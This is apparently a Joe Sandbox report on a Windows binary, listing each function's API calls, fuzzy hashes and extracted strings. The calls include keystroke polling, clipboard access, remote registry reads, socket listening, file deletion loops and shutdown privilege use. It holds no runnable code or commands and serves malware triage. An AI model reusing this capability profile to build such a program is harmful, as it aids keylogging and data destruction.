                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oau$PJ~$UCP)$UTF)$UTF16)
                    • API String ID: 0-828581819
                    • Opcode ID: 7eb3373821aafb5da998f88982cebc285664450ac29c808f77a059cb354472b2
                    • Instruction ID: 8938c6d6f51021ab549feb54e2042aaa3f729f2c5e5a16bbeee3e608de97305b
                    • Opcode Fuzzy Hash: 7eb3373821aafb5da998f88982cebc285664450ac29c808f77a059cb354472b2
                    • Instruction Fuzzy Hash: FE727F75E0021ADBDF24CF58D8807EEB7B5EF48310F54816AE949EB290EB789D45CB90
                    APIs
                      • Part of subcall function 007C10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C0038,?,?), ref: 007C10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C0737
                      • Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
                      • Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007C07D6
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007C086E
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007C0AAD
                    • RegCloseKey.ADVAPI32(00000000), ref: 007C0ABA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    • Opcode ID: 7a5b300987fbc6294ac6eeff352bc22a8a6de8cfb57bd95977f97479ac702a9c
                    • Instruction ID: 430a941068353ad6dad19057d7b350e8f589e277640d0a7c0475f2b806a835a4
                    • Opcode Fuzzy Hash: 7a5b300987fbc6294ac6eeff352bc22a8a6de8cfb57bd95977f97479ac702a9c
                    • Instruction Fuzzy Hash: EDE13C71204210EFCB14DF24C895E6BBBE9EF89714B04C56DF84ADB2A2DB34E905CB91
                    APIs
                    • GetKeyboardState.USER32(?), ref: 007A0241
                    • GetAsyncKeyState.USER32(000000A0), ref: 007A02C2
                    • GetKeyState.USER32(000000A0), ref: 007A02DD
                    • GetAsyncKeyState.USER32(000000A1), ref: 007A02F7
                    • GetKeyState.USER32(000000A1), ref: 007A030C
                    • GetAsyncKeyState.USER32(00000011), ref: 007A0324
                    • GetKeyState.USER32(00000011), ref: 007A0336
                    • GetAsyncKeyState.USER32(00000012), ref: 007A034E
                    • GetKeyState.USER32(00000012), ref: 007A0360
                    • GetAsyncKeyState.USER32(0000005B), ref: 007A0378
                    • GetKeyState.USER32(0000005B), ref: 007A038A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 36d6833821de6db8375f75e7e740a92c678bb9a9ef9577e98ca23561f475842d
                    • Instruction ID: 25c5fe31ef890036561ca30a251d0a0f38243889afba7e1b0718aa5fe845dd15
                    • Opcode Fuzzy Hash: 36d6833821de6db8375f75e7e740a92c678bb9a9ef9577e98ca23561f475842d
                    • Instruction Fuzzy Hash: 2041C9345047C96EFF318B6498087A5BEA17F93340F088A9DD6C6461C2E79D99D887E2
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    • Opcode ID: 26d156c9d61f971ae334436a9fc10025f19ae7fa520cedcaf5151d53330ec9ca
                    • Instruction ID: e8012865574ce5fb7efda2e0a6e7f489e0ae59fa5fa9bcab6764ffe5884be503
                    • Opcode Fuzzy Hash: 26d156c9d61f971ae334436a9fc10025f19ae7fa520cedcaf5151d53330ec9ca
                    • Instruction Fuzzy Hash: 65213D352006109FDB10AF64EC49FAE77A9EF44711F14C02AF946EB2A2DB78AD11CB59
                    APIs
                      • Part of subcall function 007448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007448A1,?,?,007437C0,?), ref: 007448CE
                      • Part of subcall function 007A4CD3: GetFileAttributesW.KERNEL32(?,007A3947), ref: 007A4CD4
                    • FindFirstFileW.KERNEL32(?,?), ref: 007A3ADF
                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007A3B87
                    • MoveFileW.KERNEL32(?,?), ref: 007A3B9A
                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007A3BB7
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007A3BD9
                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 007A3BF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                    • String ID: \*.*
                    • API String ID: 4002782344-1173974218
                    • Opcode ID: e3b1f6c3d44ff7bc63af925c3646f38543e8112660430b498dd46de90d0ef6ee
                    • Instruction ID: 5186b8ff125b3cfda5e67ae8d447d7e8c5a1ceb368ee4ecbeddc4d99493ca17f
                    • Opcode Fuzzy Hash: e3b1f6c3d44ff7bc63af925c3646f38543e8112660430b498dd46de90d0ef6ee
                    • Instruction Fuzzy Hash: 16517E31801158EBCF05EFA0CD969EDB779AF56300F648269F44677092DF296F09CB60
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID: ERCP$Oau$VUUU$VUUU$VUUU$VUUU
                    • API String ID: 0-2652741529
                    • Opcode ID: 5f3f6c77e567cdb688c0e5948db6eb84e93a17e89d24c8752c2b1414d749f673
                    • Instruction ID: 3f9f82d57e7566dc4c831d7c593feb0fc5e74e6cfdb429290712b0723367bc37
                    • Opcode Fuzzy Hash: 5f3f6c77e567cdb688c0e5948db6eb84e93a17e89d24c8752c2b1414d749f673
                    • Instruction Fuzzy Hash: 77A28E70E0421ACBDF28DF58C9847EDB7B1FB54319F2481A9D816A7240E7789EC9CB51
                    APIs
                      • Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82
                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007AF6AB
                    • Sleep.KERNEL32(0000000A), ref: 007AF6DB
                    • _wcscmp.LIBCMT ref: 007AF6EF
                    • _wcscmp.LIBCMT ref: 007AF70A
                    • FindNextFileW.KERNEL32(?,?), ref: 007AF7A8
                    • FindClose.KERNEL32(00000000), ref: 007AF7BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                    • String ID: *.*
                    • API String ID: 713712311-438819550
                    • Opcode ID: 0185bebe045492b58d2dd87f74bc1b1b8f81b656da70b4edf2cd560b33173346
                    • Instruction ID: 72b18a5cfe36b742d8c628923a1b4fa24a32d24104f084aa7b81291bd904d0f4
                    • Opcode Fuzzy Hash: 0185bebe045492b58d2dd87f74bc1b1b8f81b656da70b4edf2cd560b33173346
                    • Instruction Fuzzy Hash: 3C418F7190021AEBCF55DFA4CC89EEEBBB4FF46310F54466AE815A3190DB389E44CB90
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 4db9b256aa036f78c869381e15fdd54809363bc550799a74defe42345c99f9da
                    • Instruction ID: 88d1c893a28e6f474c448d61516331dccd26dfa66cc6512e446af960c4b7a544
                    • Opcode Fuzzy Hash: 4db9b256aa036f78c869381e15fdd54809363bc550799a74defe42345c99f9da
                    • Instruction Fuzzy Hash: 121279B0A00609DFDF14DFA4D999AEEB7B5FF48300F108569E806E7251EB39AD15CB90
                    APIs
                      • Part of subcall function 00760FF6: std::exception::exception.LIBCMT ref: 0076102C
                      • Part of subcall function 00760FF6: __CxxThrowException@8.LIBCMT ref: 00761041
                    • _memmove.LIBCMT ref: 0079062F
                    • _memmove.LIBCMT ref: 00790744
                    • _memmove.LIBCMT ref: 007907EB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                    • String ID: yZu
                    • API String ID: 1300846289-3294280352
                    • Opcode ID: 55bd049451a728c8d6ba57c9ef001e8c1529e034c9c4a40952df9c27bae7f0dd
                    • Instruction ID: 5fdbec23ce7a997667bdc3321a75f53a57752740ef828a06e25ded1992da6de6
                    • Opcode Fuzzy Hash: 55bd049451a728c8d6ba57c9ef001e8c1529e034c9c4a40952df9c27bae7f0dd
                    • Instruction Fuzzy Hash: 8C02A0B0A00209DFCF04DF64E995AAEBBB5FF44310F148069E806DB255EB39EA55CB91
                    APIs
                      • Part of subcall function 00798CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00798D0D
                      • Part of subcall function 00798CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00798D3A
                      • Part of subcall function 00798CC3: GetLastError.KERNEL32 ref: 00798D47
                    • ExitWindowsEx.USER32(?,00000000), ref: 007A549B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    • API String ID: 2234035333-194228
                    • Opcode ID: 8c4df0c346a7cc737aca7b3b65d5c81ab257af56197c5279bca91a0f5f7fba48
                    • Instruction ID: 7a7d261430ec0b439bb53d3660d13f01c10fad02283f5237d7836b7b66bdc5b4
                    • Opcode Fuzzy Hash: 8c4df0c346a7cc737aca7b3b65d5c81ab257af56197c5279bca91a0f5f7fba48
                    • Instruction Fuzzy Hash: 7A014771655A416AEB685674EC4AFBA7358EB8B353F200324FD06D20C2DA5C0C8081A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID: Oau
                    • API String ID: 674341424-3624848570
                    • Opcode ID: a78672d74e43e3e7cb9fe946d9740f954538c87b25ff7463479d05940daef1e1
                    • Instruction ID: 9ec0dcfaf0d36b07c6da4fbd8e56d1f01344ed74da70a0137a9cf4d95205ed88
                    • Opcode Fuzzy Hash: a78672d74e43e3e7cb9fe946d9740f954538c87b25ff7463479d05940daef1e1
                    • Instruction Fuzzy Hash: 19229D71608341DFC724DF24C895BABB7E4BF84350F10491DF996972A1EB78EA08CB92
                    APIs
                    • socket.WSOCK32(00000002,00000001,00000006), ref: 007B65EF
                    • WSAGetLastError.WSOCK32(00000000), ref: 007B65FE
                    • bind.WSOCK32(00000000,?,00000010), ref: 007B661A
                    • listen.WSOCK32(00000000,00000005), ref: 007B6629
                    • WSAGetLastError.WSOCK32(00000000), ref: 007B6643
                    • closesocket.WSOCK32(00000000), ref: 007B6657
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    • API String ID: 1279440585-0
                    • Opcode ID: ba1967801d82b8acbd52389f3333c5d6114a50f74fff4cf13736dc6ad54b7f78
                    • Instruction ID: 4b305ec236ba196aadf7623aadcf3807e9d8e1c85f920d9c550f8ed3e6d4b23d
                    • Opcode Fuzzy Hash: ba1967801d82b8acbd52389f3333c5d6114a50f74fff4cf13736dc6ad54b7f78
                    • Instruction Fuzzy Hash: 47217C31600204DFCB10AF64D889FAEB7EAEF49724F148169EA56E73D1CB78AD01CB55
                    APIs
                      • Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623
                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 007419FA
                    • GetSysColor.USER32(0000000F), ref: 00741A4E
                    • SetBkColor.GDI32(?,00000000), ref: 00741A61
                      • Part of subcall function 00741290: DefDlgProcW.USER32(?,00000020,?), ref: 007412D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ColorProc$LongWindow
                    • String ID:
                    • API String ID: 3744519093-0
                    • Opcode ID: a5ed0ef7f5ec98af736198e9d8196bb1de4cfca0be38198b5d615b61775f591a
                    • Instruction ID: 0b0fd535224a1e66a31db8895c95b03ccf46ef4ada78e9d9aedb83e9d38278fe
                    • Opcode Fuzzy Hash: a5ed0ef7f5ec98af736198e9d8196bb1de4cfca0be38198b5d615b61775f591a
                    • Instruction Fuzzy Hash: 09A158B0201584FADA29BF384C48F7B2B9DEB46385B94C11DF406D6192DB2C9C919276
                    APIs
                      • Part of subcall function 007B80A0: inet_addr.WSOCK32(00000000), ref: 007B80CB
                    • socket.WSOCK32(00000002,00000002,00000011), ref: 007B6AB1
                    • WSAGetLastError.WSOCK32(00000000), ref: 007B6ADA
                    • bind.WSOCK32(00000000,?,00000010), ref: 007B6B13
                    • WSAGetLastError.WSOCK32(00000000), ref: 007B6B20
                    • closesocket.WSOCK32(00000000), ref: 007B6B34
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                    • String ID:
                    • API String ID: 99427753-0
                    • Opcode ID: a6c754acc2ac316861548928b889f8c2fa471eac9558357fe69142fdf15e6a5b
                    • Instruction ID: 0c4c867d79b0eefbde4d6a94ee09de14a3594569990adc1017904d9b3dfb1dc1
                    • Opcode Fuzzy Hash: a6c754acc2ac316861548928b889f8c2fa471eac9558357fe69142fdf15e6a5b
                    • Instruction Fuzzy Hash: EB417E75700214EFEB10BF649C8AF6E77A99B45720F448058FA5AAB3D2DB789D008691
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    • API String ID: 292994002-0
                    • Opcode ID: 140a92efc43be40db478ff6a29c16f83e7a9988de1c35b4242d8371163d2afd5
                    • Instruction ID: c4bbe2a80e96dcb1e10a8bc81a8b98e86bb9c3194e7e2776cba25c3b77927672
                    • Opcode Fuzzy Hash: 140a92efc43be40db478ff6a29c16f83e7a9988de1c35b4242d8371163d2afd5
                    • Instruction Fuzzy Hash: CB11B231300910AFE7215F26DC48F6BBB99EF44B21B84842DE946E7241CB79E941CAA9
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 007AC69D
                    • CoCreateInstance.OLE32(007D2D6C,00000000,00000001,007D2BDC,?), ref: 007AC6B5
                      • Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82
                    • CoUninitialize.OLE32 ref: 007AC922
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CreateInitializeInstanceUninitialize_memmove
                    • String ID: .lnk
                    • API String ID: 2683427295-24824748
                    • Opcode ID: 2c68bb657e5e4107f7877fca9d238abb07345d9ef46132750cd2b3cc20162c9c
                    • Instruction ID: 50cb91705493097955be46c96ee3c48da8f948fad694a51357af1eafe80a696f
                    • Opcode Fuzzy Hash: 2c68bb657e5e4107f7877fca9d238abb07345d9ef46132750cd2b3cc20162c9c
                    • Instruction Fuzzy Hash: A2A13E71208205EFD700EF54C885EABB7ECEF95704F008A1DF196972A2DB74EA49CB52
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00781D88,?), ref: 007BC312
                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007BC324
                    Strings
                    Memory Dump Source
